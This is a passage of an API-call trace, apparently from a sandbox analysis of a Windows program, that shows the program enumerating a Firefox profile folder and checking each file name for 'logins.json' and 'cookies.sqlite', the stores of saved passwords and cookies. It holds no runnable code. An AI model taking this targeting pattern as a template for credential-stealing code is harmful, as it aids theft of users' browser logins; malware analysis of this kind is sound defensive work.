HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.js") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.js" [0161.163] VirtualQuery (in: lpAddress=0x924988, lpBuffer=0x2df758, dwLength=0x1c | out: lpBuffer=0x2df758*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.163] GetProcessHeap () returned 0x8e0000 [0161.163] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924988 | out: hHeap=0x8e0000) returned 1 [0161.163] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.js", lpSrch="logins.json") returned 0x0 [0161.163] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.js", lpSrch="cookies.sqlite") returned 0x0 [0161.163] VirtualQuery (in: lpAddress=0x8fce90, lpBuffer=0x2df764, dwLength=0x1c | out: lpBuffer=0x2df764*(BaseAddress=0x8fc000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x4c000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.163] GetProcessHeap () returned 0x8e0000 [0161.163] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8fce90 | out: hHeap=0x8e0000) returned 1 [0161.163] FindNextFileW (in: hFindFile=0x8f9a40, lpFindFileData=0x2df7b0 | out: lpFindFileData=0x2df7b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb66495d0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb66495d0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb6f36850, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x50000, dwReserved0=0x76c52a4b, dwReserved1=0x0, cFileName="signons.sqlite", cAlternateFileName="SIGNON~1.SQL")) returned 1 [0161.163] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.163] lstrlenW (lpString="\\") returned 1 [0161.163] GetProcessHeap () returned 0x8e0000 [0161.163] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x924988 [0161.163] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.163] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.163] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.163] lstrlenW (lpString="signons.sqlite") returned 14 [0161.163] GetProcessHeap () returned 0x8e0000 [0161.163] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xce) returned 0x8fce90 [0161.163] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.163] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="signons.sqlite" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\signons.sqlite") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\signons.sqlite" [0161.163] VirtualQuery (in: lpAddress=0x924988, lpBuffer=0x2df758, dwLength=0x1c | out: lpBuffer=0x2df758*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.163] GetProcessHeap () returned 0x8e0000 [0161.163] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924988 | out: hHeap=0x8e0000) returned 1 [0161.163] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\signons.sqlite", lpSrch="logins.json") returned 0x0 [0161.163] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\signons.sqlite", lpSrch="cookies.sqlite") returned 0x0 [0161.163] VirtualQuery (in: lpAddress=0x8fce90, lpBuffer=0x2df764, dwLength=0x1c | out: lpBuffer=0x2df764*(BaseAddress=0x8fc000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x4c000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.163] GetProcessHeap () returned 0x8e0000 [0161.163] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8fce90 | out: hHeap=0x8e0000) returned 1 [0161.163] FindNextFileW (in: hFindFile=0x8f9a40, lpFindFileData=0x2df7b0 | out: lpFindFileData=0x2df7b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb26740e0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb26740e0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb26740e0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x1d, dwReserved0=0x76c52a4b, dwReserved1=0x0, cFileName="times.json", cAlternateFileName="TIMES~1.JSO")) returned 1 [0161.163] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.163] lstrlenW (lpString="\\") returned 1 [0161.163] GetProcessHeap () returned 0x8e0000 [0161.163] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x924988 [0161.164] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.164] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.164] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.164] lstrlenW (lpString="times.json") returned 10 [0161.164] GetProcessHeap () returned 0x8e0000 [0161.164] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc6) returned 0x924a48 [0161.164] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.164] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="times.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\times.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\times.json" [0161.164] VirtualQuery (in: lpAddress=0x924988, lpBuffer=0x2df758, dwLength=0x1c | out: lpBuffer=0x2df758*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.164] GetProcessHeap () returned 0x8e0000 [0161.164] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924988 | out: hHeap=0x8e0000) returned 1 [0161.164] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\times.json", lpSrch="logins.json") returned 0x0 [0161.164] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\times.json", lpSrch="cookies.sqlite") returned 0x0 [0161.164] VirtualQuery (in: lpAddress=0x924a48, lpBuffer=0x2df764, dwLength=0x1c | out: lpBuffer=0x2df764*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.164] GetProcessHeap () returned 0x8e0000 [0161.164] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924a48 | out: hHeap=0x8e0000) returned 1 [0161.164] FindNextFileW (in: hFindFile=0x8f9a40, lpFindFileData=0x2df7b0 | out: lpFindFileData=0x2df7b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb4f60210, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x80d71510, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x80d71510, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x76c52a4b, dwReserved1=0x0, cFileName="webapps", cAlternateFileName="")) returned 1 [0161.164] lstrcmpiW (lpString1="webapps", lpString2=".") returned 1 [0161.164] lstrcmpiW (lpString1="webapps", lpString2="..") returned 1 [0161.164] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.164] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.164] lstrlenW (lpString="\\") returned 1 [0161.164] GetProcessHeap () returned 0x8e0000 [0161.164] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x924988 [0161.164] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.164] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.164] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.164] lstrlenW (lpString="webapps") returned 7 [0161.164] GetProcessHeap () returned 0x8e0000 [0161.164] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc0) returned 0x924a48 [0161.164] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.164] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="webapps" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps" [0161.164] VirtualQuery (in: lpAddress=0x924988, lpBuffer=0x2df758, dwLength=0x1c | out: lpBuffer=0x2df758*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.164] GetProcessHeap () returned 0x8e0000 [0161.165] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924988 | out: hHeap=0x8e0000) returned 1 [0161.165] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps") returned 95 [0161.165] lstrlenW (lpString="") returned 0 [0161.165] GetProcessHeap () returned 0x8e0000 [0161.165] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc0) returned 0x924b10 [0161.165] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps" [0161.165] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps", lpString2="" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps" [0161.165] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps") returned 95 [0161.165] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps") returned 95 [0161.165] lstrlenW (lpString="\\*.*") returned 4 [0161.165] GetProcessHeap () returned 0x8e0000 [0161.165] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc8) returned 0x924bd8 [0161.165] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps" [0161.165] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\*.*" [0161.165] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\*.*", lpFindFileData=0x2df538 | out: lpFindFileData=0x2df538*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb4f60210, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x80d71510, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x80d71510, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x54, dwReserved1=0x54, cFileName=".", cAlternateFileName="")) returned 0x8f9a80 [0161.165] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.165] FindNextFileW (in: hFindFile=0x8f9a80, lpFindFileData=0x2df538 | out: lpFindFileData=0x2df538*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb4f60210, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x80d71510, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x80d71510, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x54, dwReserved1=0x54, cFileName="..", cAlternateFileName="")) returned 1 [0161.165] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.165] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.165] FindNextFileW (in: hFindFile=0x8f9a80, lpFindFileData=0x2df538 | out: lpFindFileData=0x2df538*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80cff0f0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x80cff0f0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x80cff0f0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x2, dwReserved0=0x54, dwReserved1=0x54, cFileName="webapps.json", cAlternateFileName="WEBAPP~1.JSO")) returned 1 [0161.165] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps") returned 95 [0161.165] lstrlenW (lpString="\\") returned 1 [0161.165] GetProcessHeap () returned 0x8e0000 [0161.165] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc2) returned 0x924ca8 [0161.165] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps" [0161.166] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\" [0161.166] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\") returned 96 [0161.166] lstrlenW (lpString="webapps.json") returned 12 [0161.166] GetProcessHeap () returned 0x8e0000 [0161.166] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xda) returned 0x924d78 [0161.166] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\" [0161.166] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\", lpString2="webapps.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\webapps.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\webapps.json" [0161.166] VirtualQuery (in: lpAddress=0x924ca8, lpBuffer=0x2df4e0, dwLength=0x1c | out: lpBuffer=0x2df4e0*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.166] GetProcessHeap () returned 0x8e0000 [0161.166] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924ca8 | out: hHeap=0x8e0000) returned 1 [0161.166] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\webapps.json", lpSrch="logins.json") returned 0x0 [0161.166] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\webapps.json", lpSrch="cookies.sqlite") returned 0x0 [0161.166] VirtualQuery (in: lpAddress=0x924d78, lpBuffer=0x2df4ec, dwLength=0x1c | out: lpBuffer=0x2df4ec*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.166] GetProcessHeap () returned 0x8e0000 [0161.166] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924d78 | out: hHeap=0x8e0000) returned 1 [0161.166] FindNextFileW (in: hFindFile=0x8f9a80, lpFindFileData=0x2df538 | out: lpFindFileData=0x2df538*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80cff0f0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x80cff0f0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x80cff0f0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x2, dwReserved0=0x54, dwReserved1=0x54, cFileName="webapps.json", cAlternateFileName="WEBAPP~1.JSO")) returned 0 [0161.166] FindClose (in: hFindFile=0x8f9a80 | out: hFindFile=0x8f9a80) returned 1 [0161.166] VirtualQuery (in: lpAddress=0x924bd8, lpBuffer=0x2df4ec, dwLength=0x1c | out: lpBuffer=0x2df4ec*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.166] GetProcessHeap () returned 0x8e0000 [0161.166] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924bd8 | out: hHeap=0x8e0000) returned 1 [0161.166] VirtualQuery (in: lpAddress=0x924b10, lpBuffer=0x2df4ec, dwLength=0x1c | out: lpBuffer=0x2df4ec*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.166] GetProcessHeap () returned 0x8e0000 [0161.166] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924b10 | out: hHeap=0x8e0000) returned 1 [0161.166] VirtualQuery (in: lpAddress=0x924a48, lpBuffer=0x2df764, dwLength=0x1c | out: lpBuffer=0x2df764*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.166] GetProcessHeap () returned 0x8e0000 [0161.166] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924a48 | out: hHeap=0x8e0000) returned 1 [0161.166] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.167] lstrlenW (lpString="\\") returned 1 [0161.167] GetProcessHeap () returned 0x8e0000 [0161.167] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x924988 [0161.167] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.167] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.167] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.167] lstrlenW (lpString="webapps") returned 7 [0161.167] GetProcessHeap () returned 0x8e0000 [0161.167] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc0) returned 0x924a48 [0161.167] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.167] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="webapps" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps" [0161.167] VirtualQuery (in: lpAddress=0x924988, lpBuffer=0x2df758, 